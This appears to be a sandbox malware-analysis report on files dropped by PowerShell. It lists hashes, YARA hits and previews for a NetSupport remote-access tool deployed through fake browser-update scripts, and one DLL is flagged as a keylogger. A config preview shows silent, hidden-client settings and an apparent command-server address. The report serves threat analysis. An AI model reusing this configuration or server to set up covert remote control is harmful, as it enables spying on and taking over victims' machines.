                                                                              Preview:PK.........DWW..%.&l..........client32.exe.|.xT.....N..".R....A.W..@........Tj.$...Q.@... ...7!...@..iJ.......;3....R..~.....;g...3gfnx...T.@......b../....d.@...n{...ts....5d.....]%.i..v...:3lZ..i]G.9v.:...\__...F.).C....(..B..t..P.f....&..9..e.k9.:.K.X...8..`.@...Oph.@W...B.p....N.]A.....A^...!..Y..T...+..t........`..KUg.....`..]w..=k...g...7.......4<..=f..|..8T.."...z..:..ae>s.L.(....f.U.%=.).Iq.....T..px-..8G.G...`8.>{#.=....&B..G..)t........uY:R0..C.....C.........G......1r.e..K5HMop..ZJ..6.&...fM.........m....G..W.I0....hb.."NDS5...>MTz-.".i.....v..[..JC.dC........^4....4.W.U.SZ.'..........O...C.O.+..X...Cs.)S.L`3'8t.....Y..Te....~aS.G...M......9..g......0}.|-.;..N%....Hi......$.....kC..t..`..,..!&..X..$.6k..v....o_.I.......x......?_..'.A..../`S.b...u.].....t..9.6...g.l..|.2...Nte.}.N....]........)d..Q{.>g.p?G.O...g.......S.Z*.-.....^.......[......V..i...V.oh.~l+......R9.}W.F..q....4...._`G.CK..u.@l.....7l.W/..b.&... H.1..I.........

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):328056
                                                                              Entropy (8bit):6.7547459359511395
                                                                              Encrypted:false
                                                                              SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                              MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                              SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                              SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                              SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                              Joe Sandbox View:
                                                                              • Filename: update.js, Detection: malicious, Browse
                                                                              • Filename: updates.js, Detection: malicious, Browse
                                                                              • Filename: updates.js, Detection: malicious, Browse
                                                                              • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                              • Filename: updates.js, Detection: malicious, Browse
                                                                              • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                              • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                              • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                              • Filename: update.js, Detection: malicious, Browse
                                                                              • Filename: Update_122.0.616.js, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\LogoDev.png

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):24504
                                                                              Entropy (8bit):7.872865717955356
                                                                              Encrypted:false
                                                                              SSDEEP:384:qSVmAf6Ft8Itb+e2b9tdTwEy9kXs6vWZZCbiXSeEO/12Hb40yrWSbN8qtA:qImAfe7gx3y6MZC2CeV2747zbN8
                                                                              MD5:B8F553FBD3DC34B58BC77A705711023D
                                                                              SHA1:4AB1052F906FDA96F877E398426DA5646574C878
                                                                              SHA-256:2761C60263A2919B856915BDD2A0604B7F0E56E59D893AB13CCCEF2B7C967229
                                                                              SHA-512:15A1DF0DBB06B4BB64A2B8CD7AD22578292D5ECDEC64303350E027F9F87FA8A825CB1CC97F94862D8C235C85B0C79A4FEABFB89D9E0B77BE62AAB25785122A60
                                                                              Malicious:false
                                                                              Preview:.PNG........IHDR...X...X......f...._.IDATx........................................................................................................................................................................................................................................................f...:.(L..A!..].'twW..3.2 ..........'k.]Kd.|...mz..U...Tu.L..~.W.Wc......................rv.iv%.q=....u..>.o.......k.y.wo........ .,...~..U..._.7/g.........m.....*w.`........p.....8...q.,.,.g....:Q.Rt....Ga.............Z..S+.....=.,....T.Ew.....0U..`.....S.......w....Va..#.|Mo.....eY.eY....m^....r.P..S{#......D.I.y..K.&&9....@...u.^...D.....U..l.keY.eY....rv.]..H..A....^..RpQ.)@,.Im..s.~.U.....,j....._m?.V...z95l}.,.,.P....b..R.>rV.Q_m.0....(.b..@.,./.T[.S;.X....`..w.,...j.o..M.......~^......0.8.....$][=`.V.)..O..1....+...3...eY.e.[.]....s...z.E\.I!G..;).'...d.m>..+w.M.=X.S......g.o.~0........j.{.hY.eY.7.................G..e(K...y..IL.F)g..{.....Z.J}...qn..+.%

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\NSM.LIC

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):195
                                                                              Entropy (8bit):4.924914741174998
                                                                              Encrypted:false
                                                                              SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                              MD5:E9609072DE9C29DC1963BE208948BA44
                                                                              SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                              SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                              SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                              Malicious:true
                                                                              Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\NSM.ini

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:Generic INItialization configuration [Features]
                                                                              Category:dropped
                                                                              Size (bytes):6458
                                                                              Entropy (8bit):4.645519507940197
                                                                              Encrypted:false
                                                                              SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                              MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                              SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                              SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                              SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                              Malicious:false
                                                                              Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18808
                                                                              Entropy (8bit):6.292094060787929
                                                                              Encrypted:false
                                                                              SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                              MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                              SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                              SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                              SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                              Joe Sandbox View:
                                                                              • Filename: update.js, Detection: malicious, Browse
                                                                              • Filename: updates.js, Detection: malicious, Browse
                                                                              • Filename: updates.js, Detection: malicious, Browse
                                                                              • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                              • Filename: updates.js, Detection: malicious, Browse
                                                                              • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                              • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                              • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                              • Filename: update.js, Detection: malicious, Browse
                                                                              • Filename: Update_122.0.616.js, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3740024
                                                                              Entropy (8bit):6.527276298837004
                                                                              Encrypted:false
                                                                              SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                              MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                              SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                              SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                              SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\Setup_files\es-419.pak

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):535135
                                                                              Entropy (8bit):5.344978632661496
                                                                              Encrypted:false
                                                                              SSDEEP:3072:ULe8wUVX1DapjhDo9W0j1PNriQ3ofpDYl9ifmIZ1IF6ox4me5NJ5/VsJyYj44lg/:ge8L4ju9knpDYJIhoimI5NsLM4nXm62
                                                                              MD5:9557C1A015818BE52C9F7FF44F56915B
                                                                              SHA1:84282F2AAE2ADB03F4EE0450329F038E8E6F8DF3
                                                                              SHA-256:4A2D8A1A2169C380F1609A72F4111CF014ACE8B2CBB916E77668D9529B50E133
                                                                              SHA-512:8DDB6C6FED33D477D9FD07BD672F2962C5277C2CC0A8B1656D59822D1E285E853DFB70E2554F71AD481F766AE6EB6BEC17EA42E1C0716C9F01DC9E2547983066
                                                                              Malicious:false
                                                                              Preview:.........#&.e.....g.....h.....i.....j.....k.-...l.8...n.@...o.E...p.R...q.X...r.d...s.....t.....v.....w.....y.2...z.`...|.....}...................................................................(.....7.....L.....c.........................................3.....K...........[.................R.................$.....v.......................d...................................:.....j...........`.................B.......................u.................0.................d...................................h.......................M.......................D.......................^.................".................$.....0.............................j.......................b...................................X.....y...........3.....b.................5.....\...........&.....\.....l...........a.................Q.......................G.......................k................. ...........5.................@.................-.................W.....k.................'.....:...........+.....u.......

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLL

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):396664
                                                                              Entropy (8bit):6.80911343409989
                                                                              Encrypted:false
                                                                              SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                              MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                              SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                              SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                              SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLL, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 6%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):103824
                                                                              Entropy (8bit):6.674952714045651
                                                                              Encrypted:false
                                                                              SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
                                                                              MD5:C4F1B50E3111D29774F7525039FF7086
                                                                              SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                                                                              SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                                                                              SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 27%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L....iMR.....................v...... ........ ....@.................................<h....@.................................< ..<....0...q...........|.............. ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....q...0...r..................@..@.reloc..l............z..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.ini

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):670
                                                                              Entropy (8bit):5.4631538862492635
                                                                              Encrypted:false
                                                                              SSDEEP:12:u3xS2hz7q+j8ZGShR8kkivlnxOZ7+DP981E7GXXfDWQCYnmSuMtQAfRTtEa:u3I2hzp8ZNR8pivlnxOoG1fXXfD/lQAp
                                                                              MD5:15221731B8C78D255535A98220F55385
                                                                              SHA1:917CBA1D62DC16241700AC2027A67B62DBD03450
                                                                              SHA-256:B23705DDAF4DD0DA82EA5C70F7B406F13529B624DFCF8EC2C9099C07DE5B997D
                                                                              SHA-512:0883C5B8BD9865FA31614F7C8054144323DD4FC5ACD73F7E1DEC1782B1BDB2DA7F7AF4AA9BBA76847EEE42A566C5843B2F021ACCAB477805BABAB89DB6DCCF03
                                                                              Malicious:false
                                                                              Preview:0x748b6d2f....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=1..DisableDisconnect=0..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=5.181.159.137:443..gskmode=0..GSK=FH9I<H?LDJHB<A@CCHHD;K?M..GSKX=EIHJ=HBKHH;L>GCIFI;H>MCP..

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\delegatedWebFeatures.sccd

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (15941), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18112
                                                                              Entropy (8bit):5.982171430913221
                                                                              Encrypted:false
                                                                              SSDEEP:384:nPzOC+5CNMCUDCGxkKp2Z+TgNKvoUwyBDZS/1pMimimp5F9aQBb+ZIo1PCCZAhy1:niZtnLkKp2Z+TgNKvoUwqVS/L3mimp5i
                                                                              MD5:7FD9CD05F23D42FB6DEDA65BD1977AC9
                                                                              SHA1:DF25A2C9E1E9FA05805DA69FF41337B9F59755FB
                                                                              SHA-256:CA6C469655D4D0D7CE5BEB447DAB43048A377A6042C4800B322257567AC135D9
                                                                              SHA-512:6AE8ADDF0C55058803305F937593BA02202C99639A572BE0CACBFDE598019CF8DB7067E0392BD66C43CF7D8780E454EC5E08D68BCFD491B60A450FFC280C81B8
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<CustomCapabilityDescriptor xmlns="http://schemas.microsoft.com/appx/2016/sccd" xmlns:s="http://schemas.microsoft.com/appx/2016/sccd">...<CustomCapabilities>....<CustomCapability Name="Microsoft.delegatedWebFeatures_8wekyb3d8bbwe"/>...</CustomCapabilities>...<AuthorizedEntities>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217ac722205d7729ba409148cfa9e6d9e5b1cb94eaff1"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\install_state.json

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1794
                                                                              Entropy (8bit):3.5509498109363986
                                                                              Encrypted:false
                                                                              SSDEEP:24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
                                                                              MD5:3F78A0569C858AD26452633157103095
                                                                              SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
                                                                              SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
                                                                              SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
                                                                              Malicious:false
                                                                              Preview://353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\msvcr100.dll

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):773968
                                                                              Entropy (8bit):6.901559811406837
                                                                              Encrypted:false
                                                                              SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                              MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                              SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                              SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                              SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\nskbfltr.inf

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:Windows setup INFormation
                                                                              Category:dropped
                                                                              Size (bytes):328
                                                                              Entropy (8bit):4.93007757242403
                                                                              Encrypted:false
                                                                              SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                              MD5:26E28C01461F7E65C402BDF09923D435
                                                                              SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                              SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                              SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                              Malicious:false
                                                                              Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\nsm_vpro.ini

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):46
                                                                              Entropy (8bit):4.532048032699691
                                                                              Encrypted:false
                                                                              SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                              MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                              SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                              SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                              SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                              Malicious:false
                                                                              Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\package_metadata

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9
                                                                              Entropy (8bit):2.4193819456463714
                                                                              Encrypted:false
                                                                              SSDEEP:3:SV6:SU
                                                                              MD5:72E3BED9C0F2498AE7F7B8251EB63956
                                                                              SHA1:E9366F86EF5C31D2141FB5D209214D94DD1E24AF
                                                                              SHA-256:96E946E3EE860C6FAF9557327EFA311AE804AA58DD58632261B16C3C567BAA5A
                                                                              SHA-512:68EFACA86096F94C5FC7972F073361E4B12A3219834C0F3A6933837A35FA023A87D310B9E5AA2A8F88F9069320C60A490A24BA47219925010D69F88910C99758
                                                                              Malicious:false
                                                                              Preview:1.0.8.0..

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dll

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):33144
                                                                              Entropy (8bit):6.7376663312239256
                                                                              Encrypted:false
                                                                              SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                              MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                              SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                              SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
